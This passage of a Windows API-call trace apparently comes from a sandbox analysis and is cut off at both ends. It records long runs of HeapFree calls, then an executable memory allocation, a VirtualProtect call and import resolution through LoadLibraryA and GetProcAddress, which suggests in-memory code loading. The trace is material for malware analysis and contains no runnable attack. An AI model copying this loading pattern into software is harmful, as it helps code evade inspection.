dwFlags=0x0, lpMem=0x20bfad0 | out: hHeap=0x570000) returned 1 [0081.670] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x20d2ce0 | out: hHeap=0x570000) returned 1 [0081.670] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x20e5ef0 | out: hHeap=0x570000) returned 1 [0081.670] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x20f9100 | out: hHeap=0x570000) returned 1 [0081.670] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x210c310 | out: hHeap=0x570000) returned 1 [0081.670] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x211f520 | out: hHeap=0x570000) returned 1 [0081.670] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2132730 | out: hHeap=0x570000) returned 1 [0081.670] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2145940 | out: hHeap=0x570000) returned 1 [0081.670] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2158b50 | out: hHeap=0x570000) returned 1 [0081.674] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x216bd60 | out: hHeap=0x570000) returned 1 [0081.674] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x217ef70 | out: hHeap=0x570000) returned 1 [0081.674] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2192180 | out: hHeap=0x570000) returned 1 [0081.674] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x21a5390 | out: hHeap=0x570000) returned 1 [0081.674] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x21b85a0 | out: hHeap=0x570000) returned 1 [0081.674] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x21cb7b0 | out: hHeap=0x570000) returned 1 [0081.674] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x21de9c0 | out: hHeap=0x570000) returned 1 [0081.674] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x21f1bd0 | out: hHeap=0x570000) returned 1 [0081.674] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2204de0 | out: hHeap=0x570000) returned 1 [0081.674] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2217ff0 | out: hHeap=0x570000) returned 1 [0081.674] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x222b200 | out: hHeap=0x570000) returned 1 [0081.674] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x223e410 | out: hHeap=0x570000) returned 1 [0081.674] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2260080 | out: hHeap=0x570000) returned 1 [0081.674] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2273290 | out: hHeap=0x570000) returned 1 [0081.679] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x22864a0 | out: hHeap=0x570000) returned 1 [0081.679] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x22996b0 | out: hHeap=0x570000) returned 1 [0081.679] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x22ac8c0 | out: hHeap=0x570000) returned 1 [0081.679] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x22bfad0 | out: hHeap=0x570000) returned 1 [0081.679] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x22d2ce0 | out: hHeap=0x570000) returned 1 [0081.680] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x22e5ef0 | out: hHeap=0x570000) returned 1 [0081.680] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x22f9100 | out: hHeap=0x570000) returned 1 [0081.680] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x230c310 | out: hHeap=0x570000) returned 1 [0081.680] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x231f520 | out: hHeap=0x570000) returned 1 [0081.680] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2332730 | out: hHeap=0x570000) returned 1 [0081.680] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2345940 | out: hHeap=0x570000) returned 1 [0081.680] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2358b50 | out: hHeap=0x570000) returned 1 [0081.684] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x236bd60 | out: hHeap=0x570000) returned 1 [0081.684] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x237ef70 | out: hHeap=0x570000) returned 1 [0081.684] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2392180 | out: hHeap=0x570000) returned 1 [0081.684] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x23a5390 | out: hHeap=0x570000) returned 1 [0081.684] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x23b85a0 | out: hHeap=0x570000) returned 1 [0081.684] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x23cb7b0 | out: hHeap=0x570000) returned 1 [0081.684] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x23de9c0 | out: hHeap=0x570000) returned 1 [0081.684] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x23f1bd0 | out: hHeap=0x570000) returned 1 [0081.684] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2404de0 | out: hHeap=0x570000) returned 1 [0081.684] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2417ff0 | out: hHeap=0x570000) returned 1 [0081.687] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x242b200 | out: hHeap=0x570000) returned 1 [0081.688] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x243e410 | out: hHeap=0x570000) returned 1 [0081.688] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2451620 | out: hHeap=0x570000) returned 1 [0081.688] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2464830 | out: hHeap=0x570000) returned 1 [0081.692] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2477a40 | out: hHeap=0x570000) returned 1 [0081.692] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x248ac50 | out: hHeap=0x570000) returned 1 [0081.692] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x249de60 | out: hHeap=0x570000) returned 1 [0081.692] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x24b1070 | out: hHeap=0x570000) returned 1 [0081.692] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x24c4280 | out: hHeap=0x570000) returned 1 [0081.692] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x24d7490 | out: hHeap=0x570000) returned 1 [0081.692] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x24ea6a0 | out: hHeap=0x570000) returned 1 [0081.692] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x24fd8b0 | out: hHeap=0x570000) returned 1 [0081.692] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2510ac0 | out: hHeap=0x570000) returned 1 [0081.692] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2523cd0 | out: hHeap=0x570000) returned 1 [0081.692] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2536ee0 | out: hHeap=0x570000) returned 1 [0081.692] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x254a0f0 | out: hHeap=0x570000) returned 1 [0081.692] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x255d300 | out: hHeap=0x570000) returned 1 [0081.692] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2570510 | out: hHeap=0x570000) returned 1 [0081.884] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2583720 | out: hHeap=0x570000) returned 1 [0081.884] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2596930 | out: hHeap=0x570000) returned 1 [0081.885] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x25a9b40 | out: hHeap=0x570000) returned 1 [0081.886] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x25bcd50 | out: hHeap=0x570000) returned 1 [0081.886] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x25cff60 | out: hHeap=0x570000) returned 1 [0081.886] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x25e3170 | out: hHeap=0x570000) returned 1 [0081.886] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x25f6380 | out: hHeap=0x570000) returned 1 [0081.886] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2609590 | out: hHeap=0x570000) returned 1 [0081.886] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x261c7a0 | out: hHeap=0x570000) returned 1 [0081.886] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x262f9b0 | out: hHeap=0x570000) returned 1 [0081.886] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2642bc0 | out: hHeap=0x570000) returned 1 [0081.886] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2660080 | out: hHeap=0x570000) returned 1 [0081.886] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2673290 | out: hHeap=0x570000) returned 1 [0081.886] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x26864a0 | out: hHeap=0x570000) returned 1 [0081.886] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x26996b0 | out: hHeap=0x570000) returned 1 [0081.886] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x26ac8c0 | out: hHeap=0x570000) returned 1 [0081.887] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x26bfad0 | out: hHeap=0x570000) returned 1 [0081.887] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x26d2ce0 | out: hHeap=0x570000) returned 1 [0081.887] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x26e5ef0 | out: hHeap=0x570000) returned 1 [0081.887] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x26f9100 | out: hHeap=0x570000) returned 1 [0081.887] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x270c310 | out: hHeap=0x570000) returned 1 [0081.894] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x271f520 | out: hHeap=0x570000) returned 1 [0081.896] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2732730 | out: hHeap=0x570000) returned 1 [0081.896] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2745940 | out: hHeap=0x570000) returned 1 [0081.896] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2758b50 | out: hHeap=0x570000) returned 1 [0081.899] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x276bd60 | out: hHeap=0x570000) returned 1 [0081.899] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x277ef70 | out: hHeap=0x570000) returned 1 [0081.899] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2792180 | out: hHeap=0x570000) returned 1 [0081.899] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x27a5390 | out: hHeap=0x570000) returned 1 [0081.899] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x27b85a0 | out: hHeap=0x570000) returned 1 [0081.899] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x27cb7b0 | out: hHeap=0x570000) returned 1 [0081.899] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x27de9c0 | out: hHeap=0x570000) returned 1 [0081.899] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x27f1bd0 | out: hHeap=0x570000) returned 1 [0081.899] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2804de0 | out: hHeap=0x570000) returned 1 [0081.899] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2817ff0 | out: hHeap=0x570000) returned 1 [0081.899] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x282b200 | out: hHeap=0x570000) returned 1 [0081.899] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x283e410 | out: hHeap=0x570000) returned 1 [0081.899] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2851620 | out: hHeap=0x570000) returned 1 [0081.899] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2864830 | out: hHeap=0x570000) returned 1 [0081.905] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2877a40 | out: hHeap=0x570000) returned 1 [0081.905] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x288ac50 | out: hHeap=0x570000) returned 1 [0081.905] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x289de60 | out: hHeap=0x570000) returned 1 [0081.905] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x28b1070 | out: hHeap=0x570000) returned 1 [0081.905] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x28c4280 | out: hHeap=0x570000) returned 1 [0081.905] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x28d7490 | out: hHeap=0x570000) returned 1 [0081.905] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x28ea6a0 | out: hHeap=0x570000) returned 1 [0081.905] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x28fd8b0 | out: hHeap=0x570000) returned 1 [0081.905] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2910ac0 | out: hHeap=0x570000) returned 1 [0081.905] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2923cd0 | out: hHeap=0x570000) returned 1 [0081.905] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2936ee0 | out: hHeap=0x570000) returned 1 [0081.905] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x294a0f0 | out: hHeap=0x570000) returned 1 [0081.905] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x295d300 | out: hHeap=0x570000) returned 1 [0081.906] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2970510 | out: hHeap=0x570000) returned 1 [0081.911] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2983720 | out: hHeap=0x570000) returned 1 [0081.912] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2996930 | out: hHeap=0x570000) returned 1 [0081.912] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x29a9b40 | out: hHeap=0x570000) returned 1 [0081.912] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x29bcd50 | out: hHeap=0x570000) returned 1 [0081.913] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x29cff60 | out: hHeap=0x570000) returned 1 [0081.914] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x29e3170 | out: hHeap=0x570000) returned 1 [0081.914] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x29f6380 | out: hHeap=0x570000) returned 1 [0081.914] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2a09590 | out: hHeap=0x570000) returned 1 [0081.914] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2a1c7a0 | out: hHeap=0x570000) returned 1 [0081.914] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2a2f9b0 | out: hHeap=0x570000) returned 1 [0081.914] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2a42bc0 | out: hHeap=0x570000) returned 1 [0081.914] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2a55dd0 | out: hHeap=0x570000) returned 1 [0081.914] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2a68fe0 | out: hHeap=0x570000) returned 1 [0081.914] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2a7c1f0 | out: hHeap=0x570000) returned 1 [0081.919] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2a8f400 | out: hHeap=0x570000) returned 1 [0081.919] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2aa2610 | out: hHeap=0x570000) returned 1 [0081.919] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2ab5820 | out: hHeap=0x570000) returned 1 [0081.919] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2ac8a30 | out: hHeap=0x570000) returned 1 [0081.919] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2adbc40 | out: hHeap=0x570000) returned 1 [0082.006] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2aeee50 | out: hHeap=0x570000) returned 1 [0082.007] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2b02060 | out: hHeap=0x570000) returned 1 [0082.008] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2b15270 | out: hHeap=0x570000) returned 1 [0082.008] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2b28480 | out: hHeap=0x570000) returned 1 [0082.008] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2b3b690 | out: hHeap=0x570000) returned 1 [0082.008] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2b4e8a0 | out: hHeap=0x570000) returned 1 [0082.008] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2b61ab0 | out: hHeap=0x570000) returned 1 [0082.008] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2b74cc0 | out: hHeap=0x570000) returned 1 [0082.008] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2b87ed0 | out: hHeap=0x570000) returned 1 [0082.012] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2b9b0e0 | out: hHeap=0x570000) returned 1 [0082.012] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2bae2f0 | out: hHeap=0x570000) returned 1 [0082.013] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2bc1500 | out: hHeap=0x570000) returned 1 [0082.013] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2bd4710 | out: hHeap=0x570000) returned 1 [0082.013] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2be7920 | out: hHeap=0x570000) returned 1 [0082.013] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2bfab30 | out: hHeap=0x570000) returned 1 [0082.058] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2c0dd40 | out: hHeap=0x570000) returned 1 [0082.059] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2c20f50 | out: hHeap=0x570000) returned 1 [0082.059] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2c34160 | out: hHeap=0x570000) returned 1 [0082.059] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2c47370 | out: hHeap=0x570000) returned 1 [0082.059] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2c5a580 | out: hHeap=0x570000) returned 1 [0082.059] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2c6d790 | out: hHeap=0x570000) returned 1 [0082.060] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2c809a0 | out: hHeap=0x570000) returned 1 [0082.060] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2c93bb0 | out: hHeap=0x570000) returned 1 [0082.064] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2ca6dc0 | out: hHeap=0x570000) returned 1 [0082.064] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2cb9fd0 | out: hHeap=0x570000) returned 1 [0082.064] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2ccd1e0 | out: hHeap=0x570000) returned 1 [0082.064] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2ce03f0 | out: hHeap=0x570000) returned 1 [0082.064] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2cf3600 | out: hHeap=0x570000) returned 1 [0082.064] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2d06810 | out: hHeap=0x570000) returned 1 [0082.067] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2d19a20 | out: hHeap=0x570000) returned 1 [0082.068] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2d2cc30 | out: hHeap=0x570000) returned 1 [0082.068] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2d3fe40 | out: hHeap=0x570000) returned 1 [0082.068] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2d53050 | out: hHeap=0x570000) returned 1 [0082.068] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2d66260 | out: hHeap=0x570000) returned 1 [0082.068] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2d79470 | out: hHeap=0x570000) returned 1 [0082.068] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2d8c680 | out: hHeap=0x570000) returned 1 [0082.069] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2d9f890 | out: hHeap=0x570000) returned 1 [0082.073] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2db2aa0 | out: hHeap=0x570000) returned 1 [0082.073] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2dc5cb0 | out: hHeap=0x570000) returned 1 [0082.073] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2dd8ec0 | out: hHeap=0x570000) returned 1 [0082.073] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2dec0d0 | out: hHeap=0x570000) returned 1 [0082.073] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2dff2e0 | out: hHeap=0x570000) returned 1 [0082.076] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2e124f0 | out: hHeap=0x570000) returned 1 [0082.077] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2e25700 | out: hHeap=0x570000) returned 1 [0082.077] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2e38910 | out: hHeap=0x570000) returned 1 [0082.077] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2e60080 | out: hHeap=0x570000) returned 1 [0082.077] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2e73290 | out: hHeap=0x570000) returned 1 [0082.077] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2e864a0 | out: hHeap=0x570000) returned 1 [0082.077] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2e996b0 | out: hHeap=0x570000) returned 1 [0082.077] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2eac8c0 | out: hHeap=0x570000) returned 1 [0082.077] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2ebfad0 | out: hHeap=0x570000) returned 1 [0082.077] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2ed2ce0 | out: hHeap=0x570000) returned 1 [0082.077] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2ee5ef0 | out: hHeap=0x570000) returned 1 [0082.078] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2ef9100 | out: hHeap=0x570000) returned 1 [0082.181] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2f0c310 | out: hHeap=0x570000) returned 1 [0082.183] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2f1f520 | out: hHeap=0x570000) returned 1 [0082.183] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2f32730 | out: hHeap=0x570000) returned 1 [0082.183] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2f45940 | out: hHeap=0x570000) returned 1 [0082.183] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2f58b50 | out: hHeap=0x570000) returned 1 [0082.186] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2f6bd60 | out: hHeap=0x570000) returned 1 [0082.186] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2f7ef70 | out: hHeap=0x570000) returned 1 [0082.186] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2f92180 | out: hHeap=0x570000) returned 1 [0082.187] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2fa5390 | out: hHeap=0x570000) returned 1 [0082.187] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2fb85a0 | out: hHeap=0x570000) returned 1 [0082.187] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2fcb7b0 | out: hHeap=0x570000) returned 1 [0082.189] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2fde9c0 | out: hHeap=0x570000) returned 1 [0082.190] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x2ff1bd0 | out: hHeap=0x570000) returned 1 [0082.190] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3004de0 | out: hHeap=0x570000) returned 1 [0082.190] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3017ff0 | out: hHeap=0x570000) returned 1 [0082.190] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x302b200 | out: hHeap=0x570000) returned 1 [0082.191] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x303e410 | out: hHeap=0x570000) returned 1 [0082.191] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3051620 | out: hHeap=0x570000) returned 1 [0082.191] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3064830 | out: hHeap=0x570000) returned 1 [0082.195] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3077a40 | out: hHeap=0x570000) returned 1 [0082.195] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x308ac50 | out: hHeap=0x570000) returned 1 [0082.196] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x309de60 | out: hHeap=0x570000) returned 1 [0082.197] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x30b1070 | out: hHeap=0x570000) returned 1 [0082.197] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x30c4280 | out: hHeap=0x570000) returned 1 [0082.197] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x30d7490 | out: hHeap=0x570000) returned 1 [0082.197] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x30ea6a0 | out: hHeap=0x570000) returned 1 [0082.197] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x30fd8b0 | out: hHeap=0x570000) returned 1 [0082.197] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3110ac0 | out: hHeap=0x570000) returned 1 [0082.197] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3123cd0 | out: hHeap=0x570000) returned 1 [0082.197] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3136ee0 | out: hHeap=0x570000) returned 1 [0082.197] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x314a0f0 | out: hHeap=0x570000) returned 1 [0082.201] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x315d300 | out: hHeap=0x570000) returned 1 [0082.204] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3170510 | out: hHeap=0x570000) returned 1 [0082.207] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3183720 | out: hHeap=0x570000) returned 1 [0082.800] VirtualAlloc (lpAddress=0x180000000, dwSize=0x19000, flAllocationType=0x3000, flProtect=0x40) returned 0x180000000 [0082.808] VirtualProtect (in: lpAddress=0x1800122e0, dwSize=0xc8, flNewProtect=0x4, lpflOldProtect=0x14f750 | out: lpflOldProtect=0x14f750*=0x40) returned 1 [0082.809] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x7ffc5ecd0000 [0082.810] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ExitProcess") returned 0x7ffc5ecf4d80 [0082.810] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0082.810] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0082.810] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcessHeap") returned 0x7ffc5eced4f0 [0082.810] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapAlloc") returned 0x7ffc5f8352d0 [0082.811] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapFree") returned 0x7ffc5eceb480 [0082.811] GetProcAddress (hModule=0x7ffc5ecd0000, 